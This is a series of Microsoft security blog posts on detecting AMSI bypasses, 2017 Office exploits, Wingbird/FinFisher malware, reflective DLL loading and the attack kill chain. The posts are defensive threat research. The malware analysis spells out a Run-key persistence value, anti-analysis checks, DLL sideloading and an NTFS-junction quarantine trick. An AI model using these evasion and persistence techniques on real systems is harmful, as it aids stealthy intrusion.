With the instrumentation of AMSI signals added as part of the Windows 10 Fall Creators Update (version 1709), Windows Defender ATP machine learning algorithms can now make use of insight into the unobfuscated script content while continually referencing machine state changes associated with process activity. Weve also built a variety of script-based models that inspect the nature of executed scripts, such as the count of obfuscation layers, entropy, obfuscation features, ngrams, and specific API invocations, to name a few.

As AMSI peels off the obfuscation layers, Windows Defender ATP benefits from growing visibility and insight into API calls, variable names, and patterns in the general structure of malicious scripts. And while AMSI data helps improve human expert knowledge and their ability to train learning systems, our deep neural networks automatically learn features that are often hidden from human analysts.

Machine-learning detections of JavaScript and PowerShell scripts

Figure 8. Machine learning detections of JavaScript and PowerShell scripts

While these new script-based machine learning models augment our expert classifiers, we also correlate new results with other behavioral information. For example, Windows Defender ATP correlates the detection of suspicious script contents from AMSI with other proximate behaviors, such as network connections. This contextual information is provided to SecOps personnel, helping them respond to incidents efficiently.

Machine learning combines VBScript content from AMSI and tracked network activity

Figure 9. Machine learning combines VBScript content from AMSI and tracked network activity

Detection of AMSI bypass attempts

With AMSI providing powerful insight into malicious script activity, attacks are more likely to incorporate AMSI bypass mechanisms that we group into three categories:

  • Bypasses that are part of the script content and can be inspected and alerted on
  • Tampering with the AMSI sensor infrastructure, which might involve the replacement of system files or manipulation of the load order of relevant DLLs
  • Patching of AMSI instrumentation in memory

The Windows Defender ATP research team proactively develops anti-tampering mechanisms for all our sensors. We have devised heuristic alerts for possible manipulation of our optics, designing these alerts so that they are triggered in the cloud before the bypass can suppress them.

During actual attacks involving CVE-2017-8759, Windows Defender ATP not only detected malicious post-exploitation scripting activity but also detected attempts to bypass AMSI using code similar to one identified by Matt Graeber.

Windows Defender ATP alert based on AMSI bypass pattern

Figure 10. Windows Defender ATP alert based on AMSI bypass pattern

AMSI itself captured the following bypass code for analysis in the Windows Defender ATP cloud.

AMSI bypass code sent to the cloud for analysis

Figure 11. AMSI bypass code sent to the cloud for analysis

Conclusion: Windows Defender ATP machine learning and AMSI provide revolutionary defense against highly evasive script-based attacks

Provided as an open interface on Windows 10, Antimalware Scan Interface delivers powerful optics into malicious activity hidden in encrypted and obfuscated scripts that are oftentimes never written to disk. Such evasive use of scripts is becoming commonplace and is being employed by both highly skilled activity groups and authors of commodity malware.

AMSI captures malicious script behavior by looking at script content as it is interpreted, without having to check physical files or being hindered by obfuscation, encryption, or polymorphism. At the endpoint, AMSI benefits local scanners, providing the necessary optics so that even obfuscated and encrypted scripts can be inspected for malicious content. Windows Defender Antivirus, specifically, utilizes AMSI to dynamically inspect and block scripts responsible for dropping all kinds of malicious payloads, including ransomware and banking trojans.

With Windows 10 Fall Creators Update (1709), newly added script runtime instrumentation provides unparalleled visibility into script behaviors despite obfuscation. Windows Defender Antivirus uses this treasure trove of behavioral information about malicious scripts to deliver pre-breach protection at runtime. To deliver post-breach defense, Windows Defender ATP uses advanced machine learning systems to draw deeper insight from this data.

Apart from looking at specific activities and patterns of activities, new machine learning algorithms in Windows Defender ATP look at script obfuscation layers, API invocation patterns, and other features that can be used to efficiently identify malicious scripts heuristically. Windows Defender ATP also correlates script-based indicators with other proximate activities, so it can deliver even richer contextual information about suspected breaches.

To benefit from the new script runtime instrumentation and other powerful security enhancements like Windows Defender Exploit Guard, customers are encourage to install Windows 10 Fall Creators Update.

Read the The Total Economic Impact of Microsoft Windows Defender Advanced Threat Protection from Forrester to understand the significant cost savings and business benefits enabled by Windows Defender ATP. To directly experience how Windows Defender ATP can help your enterprise detect, investigate, and respond to advance attacks, sign up for a free trial.

 

Stefan Sellmer, Windows Defender ATP Research

with

Shay Kels, Windows Defender ATP Research

Karthik Selvaraj, Windows Defender Research

 

Additional readings

 


Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft community and Windows Defender Security Intelligence.

Follow us on Twitter @WDSecurity and Facebook Windows Defender Security Intelligence.

 

Office 365 Advanced Threat Protection defense for corporate networks against recent Office exploit attacks

November 21st, 2017 No comments

The Office 365 Threat Research team has seen an uptick in the use of Office exploits in attacks across various industry sectors in recent months. In this blog, we will review several of these exploits, including a group of Office moniker exploits that attackers have used in targeted as well as crimeware attacks. We will also describe the payloads associated with these exploits andhighlight our research into a particularly sophisticated piece of malware. Finally, we will demonstrate how Office 365 Advanced Threat Protection, Windows Defender Advanced Threat Protection, and Windows Defender Exploit Guard protect customers from these exploits.

Exploit attacks in Fall 2017

The discovery and public availability of a few Office exploits in the last six months led to these exploits gaining popularity among crimeware and targeted attackers alike. While crimeware attackers stick to payloads like ransomware and info stealers to attain financial gain or information theft, more sophisticated attackers clearly distinguish themselves by using advanced and multi-stage implants.

The Office 365 Threat Research team has been closely monitoring these attacks. The Microsoft Threat Intelligence Center (MSTIC) backs up our threat research with premium threat intelligence services that we use to correlate and track attacks and the threat actors behind them.

CVE-2017-0199

CVE-2017-0199 is a remote code execution (RCE) vulnerability in Microsoft Office allows a remote attacker to take control of a vulnerable machine if the user chooses to ignore protected view warning message. The vulnerability, which is a logic bug in the URL moniker that executes the HTA content using the htafile OLE object, was fixed in April 2017 security updates.

Figure 1. CVE-2017-0199 exploit code

Ever since FireEye blogged about the vulnerability, we have identified numerous attacks using this exploit. The original exploit was used in limited targeted attacks, but soon after, commodity crimeware started picking them up from the publicly available exploit generator toolkits. As shown in Figure 2, the creator and lastModifiedBy attributes help identify the use of such toolkits in generating exploit documents.

Figure 2. Exploit kit identifier

A slight variation of this exploit, this time in script moniker, was also released. When activated, this exploit can launch scriptlets (which consist of HTML code and script) hosted on a remote server. A proof-of-concept (PoC) made publicly available used a Microsoft PowerPoint Slideshow (PPSX) file to activate the script moniker and execute a remote code, as shown in Figure 3.

Figure 3. PPSX activation for script moniker

CVE-2017-8570

The July 2017 security update from Microsoft included a fix for another variation of the CVE-2017-0199 exploit, CVE-2017-8570, which was discovered in URL moniker that, similar to HTA files, can launch scriptlets hosted on a remote server. Even though the vulnerability was not exploited as zero-day, the public availability of exploit toolkit created a wave of malicious PPSX attachments.

CVE-2017-8759

In September 2017, FireEye discovered another exploit used in targeted attacks. The CVE-2017-8759 exploit takes advantage of a code injection vulnerability in .Net Framework while parsing WSDL definition using SOAP moniker. The vulnerability was fixed in the September 2017 security update. The original exploit used an HTA file similar to CVE-2017-0199 to execute the attacker code in vulnerable machines. This exploit piqued our interest because it delivered one of the most complex and multiple VM-layered malware, FinFisher, whose techniques we discuss in the succeeding section.

The CVE-2017-8759 exploit soon got ported to PPSX file. Figure 4 below shows an example of the exploit.

Figure 4. CVE-2017-8759 exploit

CVE-2017-11826

Finally, onSeptember 28,2017, Qihoo 360 identified an RTF file in targeted attacks that exploited a memory corruption vulnerability in Microsoft Office. The vulnerability exists in the way Office parses objects within nested Office tags and was fixed in the October 2017 security update. The forced address space layout randomization (ASLR) prevented the exploit from running in Office 2013 and above. Figure 5 shows the nested tags from the original exploit that led to the bug.

Figure 5. CVE-2017-11826 exploit

Payloads

Except for the memory, corruption exploit CVE-2017-11826, the exploits discussed in this blog pull the malware payload from remote locations, which could make it difficult for antivirus and sandboxes to reliably detect these exploits. Additionally, the public availability of scripts that generate exploit templates could make it challenging for incident responders.

As cited above, these exploits were used in both commodity and targeted attacks. Attackers attempt to bypass AV engine defenses using different obfuscation techniques. Here are some of the obfuscation techniques used in attacks that we recently analyzed:

  • Attackers used HLFL as element type in the malicious RTF attachment. This element is not supported in RTF official specification but serves as an effective obfuscation for static detections.

  • Similarly, we have seen attackers using ATNREF and MEQARR elements in malicious RTF attachments.

In most of the attacks we analyzed, the exploits used PowerShell to download and execute malware payloads, which are usually crimeware samples like ransomware or info stealers.

Figure 6. PowerShell payload from the HTA file

However, every now and then, we stumble upon an interesting piece of malware that particularly catches our attention. One such malware is Wingbird, also known as FinFisher, which was used in one of the targeted attacks using the CVE-2017-8759 exploit.

WingBird (also known as FinFisher)

Wingbird is an advanced piece of malware that shares characteristics with a government-grade commercial surveillance software, FinFisher. The activity group NEODYMIUM is known to use this malware in their attack campaigns.

The group behind WingBird has proven to be highly capable of using zero-day exploits in their attacks, as mentioned in our previous blog post on CVE-2017-8759. So far, we have seen the group use the exploits below in campaigns. These are mostly in line with the findings of Kaspersky Labs, which they documented in a blog:

  • CVE-2015-5119 (Adobe Flash)
  • CVE-2016-4117 (Adobe Flash)
  • CVE-2017-8759 (Microsoft Office)
  • CVE-2017-11292 (Adobe Flash)

The interesting part of this malware is the use of spaghetti code, multiple virtual machines, and lots of anti-debug and anti-analysis techniques. Due to the complexity of the threat, it could take analysts some time to completely unravel its functionality. Heres a summary of interesting tidbits, which we will expand in an upcoming detailed report on Wingbird.

The Wingbird malware goes through many stages of execution and has at least four VMs protecting the malware code. The first few stages are loaders that can probe if it is being run in virtualized or debugged environments. We found at least 12 different checks to evade the malwares execution in these environments. The most effective ones are:

  • Sandbox environment checks

    • Checks if the malware is executed under the root folder of a drive
    • Checks if the malware file is readable from an external source and if execution path contains the MD5 of its own contents

  • Fingerprinting check

    • Checks if the machine GUID, Windows product ID, and system Bios are from well-known sources

  • VM detection

    • Checks if the machine hardware IDs are VmBus in case of HyperV, or VEN_15AD in case of VMware, etc.

  • Debugger detection

    • Detects debugger and tries to kill it using undocumented APIs and information classes (specifically ThreadHideFromDebugger, ProcessDebugPort, ProcessDebugObjectHandle)

The latter stages act as an installation program that drops the following files on the disk and installs the malware based on the startup command received from the previous stage:

  • [randomName].cab –Encrypted configuration file
  • setup.cab – The last PE code section of the setup module; content still unknown
  • d3d9.dll –Malware loader used on system with restricted privileges; the module is protected by a VM
  • aepic.dll (or other name) – Malware loader used on admin privileged systems; executed from (and injected into) a faked service; protected by a VM
  • msvcr90.dll – Malware loader DLL injected into explorer.exe or winlogon.exe process; protected by a VM
  • [randomName].7z – Encrypted network plugin, used to spy the victim network communications
  • wsecedit.rar – Main malware dropped executable, protected by a VM

In the sample we analyzed, the command was 3, which led the malware to create a global event, 0x0A7F1FFAB12BB2, and drop malware components under a folder located in %ProgramData%, or in the %APPDATA% folder. If the malware is running with restricted privileges, the persistence is achieved by setting the RUN key with the value below. The name of the key is taken from the encrypted configuration file.

HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Value: “{Random value taken from config file}”
With data: “C:\WINDOWS\SYSTEM32\RUNDLL32.EXE C:\PROGRAMDATA\AUDITAPP\D3D9.DLL, CONTROL_RUN”

If the startup command is 2, the malware copies explorer.exe in the local installation directory, renames d3d9.dll to uxtheme.dll, and creates a new explorer.exe process that loads the malware DLL in memory using the DLL sideloading technique.

All of Wingbirds plugins are stored in its resource section and provide the malware various capabilities, including stealing sensitive information, spying on internet connection, or even diverting SSL connections.

Given the complex nature of the threat, we will provide more detailed analysis of the Wingbird protection mechanism and capabilities in an upcoming blog post.

Detecting Office exploit attacks with Office 365 ATP and Windows Defender Suite

Microsoft Office 365 Advanced Threat Protection blocks attacks that use these exploits based on the detection of malicious behaviors. Office 365 ATP helps secure mailboxes against email attack by blocking emails with unsafe attachments, malicious links, and linked-to files leveraging time-of-click protection. SecOps personnel can see ATP behavioral detections like below in Office 365s Threat Explorer page:

Figure 7. Office 365 ATP detection

Customers using Windows Defender Advanced Threat Protection can also see multiple alerts raised based on the activities performed by the exploit on compromised machines. Windows Defender Advanced ATP is a post-breach solution that alerts SecOps personnel about hostile activity. Windows Defender ATP uses rich security data, advanced behavioral analytics, and machine learning to detect attacks.

Figure 8. Windows Defender ATP alert

In addition, enterprises can block malicious documents using Windows Defender Exploit Guard, which is part of the defense-in-depth protection in Windows 10 Fall Creators Update. The Attack Surface Reduction (ASR) feature in Windows Defender Exploit Guard uses a set of built-in intelligence that can block malicious behaviors observed in malicious documents. ASR rules can also be turned on to block malicious attachments from being run or launched from Microsoft Outlook or webmail (such as Gmail, Hotmail, or Yahoo!).

Figure 9. Windows Defender Exploit Guard detection

Crimeware and targeted activity groups are always on the lookout for attack vectors to infiltrate systems and networks and deploy different kinds of payloads, from commodity to advanced implants. These attack vectors include Office exploits, which we observed in multiple attack campaigns. The availability of open-source and off-the-shelf exploit builders helps drive this trend.

AtMicrosoft, we dont stop working to protect our customers mailboxes. Our global network of expert research teams continuously monitors the threat landscape for new malware campaigns, exploits, and attack methods. Our end-to-end defense suite includes Office 365 ATP, Windows Defender ATP, and Windows Defender Exploit Guard, among others, which work together to provide a holistic protection for individuals and enterprises.

Categories: cybersecurity Tags:

#AVGater vulnerability does not affect Windows Defender Antivirus, MSE, or SCEP

On November 10, 2017, a vulnerability called #AVGater was discovered affecting some antivirus products. The vulnerability requires a non-administrator-level account to perform a restore of a quarantined file.

Windows Defender Antivirus and other Microsoft antimalware products, including System Center Endpoint Protection (SCEP) and Microsoft Security Essentials (MSE), are not affected by this vulnerability.

This vulnerability can be exploited to restore files that have been detected and quarantined by an antivirus product. To exploit this, malicious applications, including those launched by user-level accounts without administrator privileges, create an NTFS junction from the %System% folder to folder where the quarantined file is located. This NTFS junction can trigger the antivirus product to attempt to restore the file into the %System% folder.

This is a relatively old attack vector. By design, Microsoft antimalware products, including Windows Defender Antivirus, have never been affected by this vulnerability because it does not permit applications launched by user-level accounts to restore files from quarantine. This is part of the built-in protections against this and other known user-account permissions vulnerabilities.

Read more about Windows Defender Antivirus and the rest of our Windows Defender protection products at the following links:

 

*Edited 11/17/2017 to include other Microsoft antimalware products

 


Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft community and Windows Defender Security Intelligence.

Follow us on Twitter @WDSecurity and Facebook Windows Defender Security Intelligence.

 

Detecting reflective DLL loading with Windows Defender ATP

November 13th, 2017 No comments

Today’s attacks put emphasis on leaving little, if any, forensic evidence to maintain stealth and achieve persistence. Attackers use methods that allow exploits to stay resident within an exploited process or migrate to a long-lived process without ever creating or relying on a file on disk. In recent blogs we described how attackers use basic cross-process migration or advanced techniques like atom bombing and process hollowing to avoid detection.

Reflective Dynamic-Link Library (DLL) loading, which can load a DLL into a process memory without using the Windows loader, is another method used by attackers.

In-memory DLL loading was first described in 2004 by Skape and JT, who illustrated how one can patch the Windows loader to load DLLs from memory instead of from disk. In 2008, Stephen Fewer of Harmony Security introduced the reflective DLL loading process that loads a DLL into a process without being registered with the process. Modern attacks now use this technique to avoid detection.

Reflective DLL loading isnt trivialit requires writing the DLL into memory and then resolving its imports and/or relocating it. To reflectively load DLLs, one needs to author ones own custom loader.

However, attackers are still motivated to not use the Windows loader, as most legitimate applications would, for two reasons:

  1. Unlike when using the Windows loader (which is invoked by calling the LoadLibrary function), reflectively loading a DLL doesnt require the DLL to reside on disk. As such, an attacker can exploit a process, map the DLL into memory, and then reflectively load DLL without first saving on the disk.
  2. Because its not saved on the disk, a library that is loaded this way may not be readily visible without forensic analysis (e.g., inspecting whether executable memory has content resembling executable code).

Instrumentation and detection

A crucial aspect of reflectively loading a DLL is to have executable memory available for the DLL code. This can be accomplished by taking existing memory and changing its protection flags or by allocating new executable memory. Memory procured for DLL code is the primary signal we use to identify reflective DLL loading.

In Windows 10 Creators Update, we instrumented function calls related to procuring executable memory, namely VirtualAlloc and VirtualProtect, which generate signals for Windows Defender Advanced Threat Protection (Windows Defender ATP). Based on this instrumentation, weve built a model that detects reflective DLL loading in a broad range of high-risk processes, for example, browsers and productivity software.

The model takes a two-pronged approach, as illustrated in Figure 1:

  1. First, the model learns about the normal allocations of a process. As a simplified example, we observe that a process like Winword.exe allocates page-aligned executable memory of size 4,000 and particular execution characteristics. Only a select few threads within the Winword process allocate memory in this way.
  2. Second, we find that a process associated with malicious activity (e.g., executing a malicious macro or exploit) allocates executable memory that deviates from the normal behavior.

Figure 1. Memory allocations observed by a process running normally vs. allocations observed during malicious activity

This model shows that we can use memory events as the primary signal for detecting reflective DLL loading. In our real model, we incorporate a broad set of other features, such as allocation size, allocation history, thread information, allocation flags, etc. We also consider the fact that application behavior varies greatly because of other factors like plugins, so we add other behavioral signals like network connection behavior to increase the effectiveness of our detection.

Detecting reflective DLL Loading

Lets show how Windows Defender ATP can detect reflective DLL loading used with a common technique in modern threats: social engineering. In this attack, the target victim opens a Microsoft Word document from a file share. The victim is tricked into running a macro like the code shown in Figure 2. (Note: A variety of mechanisms allow customers to mitigate this kind attack at the onset; in addition, several upcoming Office security features further protect from this attack.)

Figure 2. Malicious macro

When the macro code runs, the Microsoft Word process reaches out to the command-and-control (C&C) server specified by the attacker, and receives the content of the DLL to be reflectively loaded. Once the DLL is reflectively loaded, it connects to the C&C and provides command line access to the victim machine.

Note that the DLL is not part of the original document and does not ever touch the disk. Other than the initial document with the small macro snippet, the rest of the attack happens in memory. Memory forensics reveals that there are several larger RWX sections mapped into the Microsoft Word process without a corresponding DLL, as shown in Figure 3. These are the memory sections where the reflectively loaded DLL resides.

Figure 3. Large RWX memory sections in Microsoft Word process upon opening malicious document and executing malicious macro

Windows Defender ATP identifies the memory allocations as abnormal and raises an alert, as shown in Figure 4. As you can see (Figure 4), Windows Defender ATP provides context on the document, along with information on command-and-control communication, which can allow security operations personnel to assess the scope of the attack and start containing the breach.

Figure 4. Example alert on WDATP

Microsoft Office 365 Advanced Threat Protection protects customers against similar attacks dynamic behavior matching. In attacks like this, SecOps personnel would see an Office 365 ATP behavioral detection like that shown in Figure 5 in Office 365s Threat Explorer page.

Figure 5. Example Office 365 ATP detection

Conclusion: Windows Defender ATP uncovers in-memory attacks

Windows 10 continues to strengthen defense capabilities against the full range of modern attacks. In this blog post, we illustrated how Windows Defender ATP detects the reflective DLL loading technique. Security operations personnel can use the alerts in Windows Defender ATP to quickly identify and respond to attacks in corporate networks.

Windows Defender Advanced ATP is a post-breach solution that alerts SecOps personnel about hostile activity. Windows Defender ATP uses rich security data, advanced behavioral analytics, and machine learning to detect the invariant techniques used in attacks. Enhanced instrumentation and detection capabilities in Windows Defender ATP can better expose covert attacks.

Windows Defender ATP also provides detailed event timelines and other contextual information that SecOps teams can use to understand attacks and quickly respond. The improved functionality in Windows Defender ATP enables them to isolate the victim machine and protect the rest of the network.

For more information about Windows Defender ATP, check out its features and capabilities and read about why a post-breach detection approach is a key component of any enterprise security strategy. Windows Defender ATP is built into the core of Windows 10 Enterprise and can be evaluated free of charge.

 

Christian Seifert

Windows Defender ATP Research

 


Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft community and Windows Defender Security Intelligence.

Follow us on Twitter @WDSecurity and Facebook Windows Defender Security Intelligence.

 

SSN for authentication is all wrong

October 23rd, 2017 No comments

Unless you were stranded on a deserted island or participating in a zen digital fast chances are youve heard plenty about the massive Equifax breach and the head-rolling fallout. In the flurry of headlines and advice about credit freezes an important part of the conversation was lost: if we didnt misuse our social security numbers, losing them wouldnt be a big deal. Let me explain: most people, and that mainly includes some pretty high-up identity experts that Ive met in my travels, dont understand the difference between identification and verification. In the real world, conflating those two points doesnt often have dire consequences. In the digital world, its a huge mistake that can lead to severe impacts.

Isnt it all just authentication you may ask? Well, yes, identification and verification are both parts of the authentication whole, but failure to understand the differences is where the mess comes in. However, one reason its so hard for many of us to separate identification and verification is that historically we havent had to. Think back to how humans authenticated to each other before the ability to travel long distances came into the picture. Our circle of acquaintances was pretty small and we knew each other by sight and sound. Just by looking at your neighbor, Bob, you could authenticate him. If you met a stranger, chances are someone else in the village knew the stranger and could vouch for her.

The ability to travel long distances changed the equation a bit. We developed documents that provided verification during the initiation phase, for example when you have to bring a birth certificate to the DMV to get your initial drivers license. And ongoing identification like a unique ID and a photo. These documents served as a single identification and verification mechanism. And that was great! Worked fine for years, until the digital age.

The digital age changed the model because rather than one person holding a single license with their photo on it, we had billions of people trying to authenticate to billions of systems with simple credentials like user name and password. And no friendly local villager to vouch for us.

Who are you? Prove it!

This is where the difference between the two really starts to matter. Identification answers the question: Who are you? Your name is an identifier. It could also be an alias, such as your unique employee ID number.

Do you want your name to be private? Imagine meeting another parent at your kids soccer game and refusing to tell them your name for security reasons. How about: Oh your new puppy is so adorable, whats her name? And you respond, If I told you, Id have to kill you. Or you try to find an address in a town with no street signs because the town is super security conscious. Ridiculous, right? Identifiers are public specifically so we can share them to help identify things.

We also want consistency in our identifiers. Imagine if that town had street signs, but changed the names of the streets every 24 hours for security reasons. And uniqueness, if every street had the same name, youd still have a heck of a time finding the right address wouldnt you?

Now that were clear on what the identifier is, we can enumerate a few aspects that make up a really good one:

  • Public
  • Unchanging
  • Unique

In a town or public road, we have a level of trust that the street sign is correct because the local authorities have governance over road signs. Back in our village, we trust Bob is Bob because we can verify him ourselves. But in the digital world, things get pretty tricky how do you verify someone or something youve never met before? Ask them to- Prove It!

We use these two aspects of authentication almost daily when we log into systems with a user ID (identification) and password (verification). How we verify in the real world can be public, unchanging, and unique because its very hard to forge a whole person. Or to switch all the street signs in a town. But verification online is trickier. We need to be able toprovide verification of who we are to a number of entities, many of whom arent great at protecting data. And if the same verification is re-used across entities, and one loses it, attackers could gain access to every site where it was used. This is why experts strongly recommend using unique passwords for every website/app. This goes for those challenge questions too. Which can lead to some fun calls with customer service, Oh, the town where I was born? Its: xja*21njaJK)`jjAQ^. At this point in time our fathers middle name, first pets name, town where we were born, school we went to and address history should be assumed public, using them as secrets for verification doesnt make sense anymore.

If one site loses your digital verification info, no worries. You only used it for that site and can create new info for the next one. What if you couldnt change your password ever? It was permanent and also got lost during the Yahoo! breach? And it was the one you use at your bank, and for your college and car loans, and your health insurance? How would you feel?

So, with that in mind, youd probably agree that the best digital verifiers are:

  • Private
  • Easily changed
  • Unique

Your turn

OK, now that you know the difference between identification and verification and the challenges of verification in a digital world, what do you think – Is your SSN a better identifier or verifier?

Categories: cybersecurity, Data Privacy, Tips & Talk Tags:

Cybersecurity’s perfect storm

The unprecedented scale and sophistication of modern cyberthreats, combined with the rapidly disappearing IT perimeter, means that while preventing an attack from becoming a breach is ideal, it is no longer realistic.

Microsoft proactively monitors the threat landscape for those emerging threats, to help better protect our customers. This involves observing the activities of targeted activity groups across billion of machines, which are often the first ones to introduce new exploits and techniques that are later used by other attackers.

So how can organizations defend against this triple threat?

Organizations need an approach to security that looks holistically across all critical endpoints, at all stages of a breach—before, during, and after. This means having tools that can not only protect against compromise, but can also detect the early signs of a breach and respond rapidly before it can cause damage to your system.

Windows Defender Advanced Threat Protection is a new post-breach security layer, designed to reduce the time it takes to detect, investigate and respond to advanced attacks. This post-breach layer, assumes breach and is designed to complement prevention technologies in the Windows 10 security stack, such as: Windows Defender Antivirus, SmartScreen, and various other OS hardening features.

By leveraging a combination of deep behavioral sensors, coupled with powerful cloud security analytics, Windows Defender ATP offers unparalleled detection, investigation and response experience. It uses behavioral analytics proven to detect unknown attacks and security data from over 1B machines to establish what’s normal. This is then coupled with support from our own industry leading hunters. Recordings of activity across all endpoints in the last 6 months allow users to go back in time to understand what happened.

Windows 10 has the protection you need, built-in

Windows Defender ATP is built-in to Windows 10, and provides a comprehensive post-breach solution to help security teams identify suspicious threats on your network that pre-breach solutions might miss.

Windows 10 and Windows Defender Advanced Threat Protection give you the future of cybersecurity NOW. Find out more at Microsoft Secure.

 

Categories: cybersecurity Tags:

Microsoft Security Intelligence Report Volume 21 is now available

The latest volume of the Microsoft Security Intelligence Report is now available for free download at www.microsoft.com/sir.

This new volume of the report includes threat data from the first half of 2016 as well as longer term trend data on industry vulnerabilities, exploits, malware, and malicious websites. The report also provides specific threat data for over 100 countries/regions.

Our Featured Intelligence content for this volume of the report includes three deep dive sections:

Protecting cloud infrastructure; detecting and mitigating threats using Azure Security Center:
As organizations move workloads to cloud-based services it is important that security teams keep abreast of changes in their threat posture. New threats can be encountered when adopting solutions that are fully cloud based, or when connecting on-premises environments to cloud services. This section of the report details common threats that organizations may encounter, and explains how security teams can use Azure Security Center to protect, detect, and respond to security threats against Azure cloud-based resources.

PROMETHIUM and NEODYMIUM: parallel zero-day attacks targeting individuals in Europe:
Microsoft proactively monitors the threat landscape for emerging threats, including observing the activities of targeted activity groups. The new report chronicles two activity groups, code-named PROMETHIUM and NEODYMIUM, both of which target individuals in a specific area of Europe. Both attack groups launched attack campaigns in May 2016 using the same zero-day exploit to seek information about specific individuals. Microsoft is sharing information about these groups to raise awareness of their activities, and to help individuals and organizations implement existing mitigation options that significantly reduce risk from these attack groups and other similar groups.

Ten years of exploits: a long-term study of exploitation of vulnerabilities in Microsoft software:
Microsoft researchers conducted a study of security vulnerabilities and the exploitation of the most severe vulnerabilities in Microsoft software over a 10-year period ending in 2015. In the past five years vulnerability disclosures have increased across the entire industry. However, the number of remote code execution (RCE) and elevation of privilege (EOP) vulnerabilities in Microsoft software has declined significantly. The results of the study suggest that while the risk posed by vulnerabilities appeared to increase in recent years, the actualized risk of exploited vulnerabilities in Microsoft software has steadily declined.

There is a lot of other new data in this report that I hope you’ll find useful.

You can download Volume 21 of the Microsoft Security Intelligence Report at www.microsoft.com/sir.

Ken Malcolmson
Executive Security Advisor, Microsoft Enterprise Cybersecurity Group

Security in agile development

This post is authored by Talhah Mir, Principal PM Manager, WWIT CP ISRM ACE

Most enterprises’ security strategies today are multifaceted – encompassing securing a variety of elements of their IT environment including identities, applications, data, devices, and infrastructure. This also includes driving or supporting security training and changes in culture and behavior for a more secure enterprise. But, security really starts at the fundamental core, at the software development level. It’s here that security can be “built in” to ensure that applications meet the security requirements of enterprises today and are aligned to a holistic, end to end security strategy.

We recently published a white paper titled, “Security for Modern Engineering,” which outlines some of the security best practices and learnings we have had on our journey to support modern engineering.  Software engineering teams everywhere are trying to achieve greater effectiveness and efficiency as they face climbing competitive pressures for differentiation, and constantly evolving customer demands. This is driving the need for significantly shorter time-to-market schedules that don’t compromise on the quality of software applications and services. To address this demand, modern engineering teams like those in Microsoft IT, are adopting agile development methodologies, embracing DevOps (a merging of development and operations), and maintaining development infrastructure that support continuous integration/continuous delivery. Today, a more secure application can be a differentiator as users of applications are becoming more aware and concerned about security.

There has never been a better time to push security automation and develop integrated security services for engineering teams as they think about operating in a modern engineering environment. Similar to how development, test, and operation roles have merged to shape today’s modern engineer, we, at Microsoft, continue to believe that a software security assurance program can yield much better results if the processes are baked seamlessly into the engineering process. This is what we advocated with the development of Microsoft Security Development Lifecycle (SDL) which to this day, continues to be a priority for a modern engineering practice. Security teams should leverage the momentum of automation to further enhance the security posture of their line-of-business application portfolio within their organization – helping to drive an effective, efficient, and competitive business.

 

Categories: cybersecurity Tags:

Disrupting the kill chain

This post is authored by Jonathan Trull, Worldwide Executive Cybersecurity Advisor, Enterprise Cybersecurity Group.

The cyber kill chain describes the typical workflow, including techniques, tactics, and procedures or TTPs, used by attackers to infiltrate an organization’s networks and systems.  The Microsoft Global Incident Response and Recovery (GIRR) Team and Enterprise Threat Detection Service, Microsoft’s managed cyber threat detection service, identify and respond to thousands of targeted attacks per year.  Based on our experience, the image below illustrates how most targeted cyber intrusions occur today.

attack-kill-chain

The initial attack typically includes the following steps:

  • External recon –  During this stage, the attacker typically searches publicly available sources to identify as much information as possible about their target.  This will include information about the target’s IP address range, business operations and supply chain, employees, executives, and technology utilized.  The goal of this stage is to develop sufficient intelligence to increase the chances of a successful attack. If the attacker has previously penetrated your environment, they may also refer to intelligence gathered during previous incursions.
  • Compromised machine – Attackers continue to use socially engineered attacks to gain an initial foothold on their victim’s network.  Why?  Because these attacks, especially if targeted and based on good intelligence, have an extremely high rate of success.  At this stage, the attacker will send a targeted phishing email to a carefully selected employee within the organization.  The email will either contain a malicious attachment or a link directing the recipient to a watering hole.  Once the user executes the attachment or visits the watering hole, another malicious tool known as a backdoor will be installed on the victim’s computer giving the attacker remote control of the computer.
  • Internal Recon and Lateral Movement – Now that the attacker has a foothold within the organization’s network, he or she will begin gathering information not previously available externally.  This will include performing host discovery scans, mapping internal networks and systems, and attempting to mount network shares.  The attacker will also begin using freely available, yet extremely effective tools, like Mimikatz and WCE to harvest credentials stored locally on the initially compromised machine and begin planning the next stage of the attack as shown below.

high-privileges-lateral-movement-cycle

  • Domain Dominance – At this stage, the attacker will attempt to elevate their level of access to a higher trusted status within the network.  The attacker’s ultimate goal is to access your data and the privileged credentials of a domain administrator offers them many ways to access to your valuable data stores.  Once this occurs, the attacker will begin to pivot throughout the network either looking for valuable data or installing ransomware for future extortion attempts or both.
  • Data Consolidation and Exfiltration – Now that the attacker has access to the valuable data within the organization’s systems, he or she must consolidate it, package it up, and send it out of the network without being detected or blocked.  This is typically accomplished by encrypting the data and transferring it to an external system controlled by the attacker using approved network protocols like DNS, FTP, and SFTP or Internet-based file transfer solutions.

Microsoft Secure and Productive Enterprise

The Microsoft Secure and Productive Enterprise is a suite of product offerings that have been purposely built to disrupt this cyber attack kill chain while still ensuring an organization’s employees remain productive.  Below, I briefly describe how each of these technologies disrupts the kill chain:

  • Office 365 Advanced Threat ProtectionThis technology is designed to disrupt the “initial compromise” stage and raise the cost of successfully using phishing attacks.
    Most attackers leverage phishing emails containing malicious attachments or links pointing to watering hole sites. Advanced Threat Protection (ATP) in Office 365 provides protection against both known and unknown malware and viruses in email, provides real-time (time-of-click) protection against malicious URLs, as well as enhanced reporting and trace capabilities.  Messages and attachments are not only scanned against signatures powered by multiple antimalware engines and intelligence from Microsoft’s Intelligent Security Graph, but are also routed to a special detonation chamber, run, and the results analyzed with machine learning and advanced analysis techniques for signs of malicious behavior to detect and block threats. Enhanced reporting capabilities also make it possible for security teams to quickly identify and respond to email based attacks when they occur.
  • Windows 10 –  This technology disrupts the compromised machine and lateral movement stages by raising the difficulty of successfully compromising and retaining control of a user’s PC and by protecting the accounts and credentials stored and used on the device.
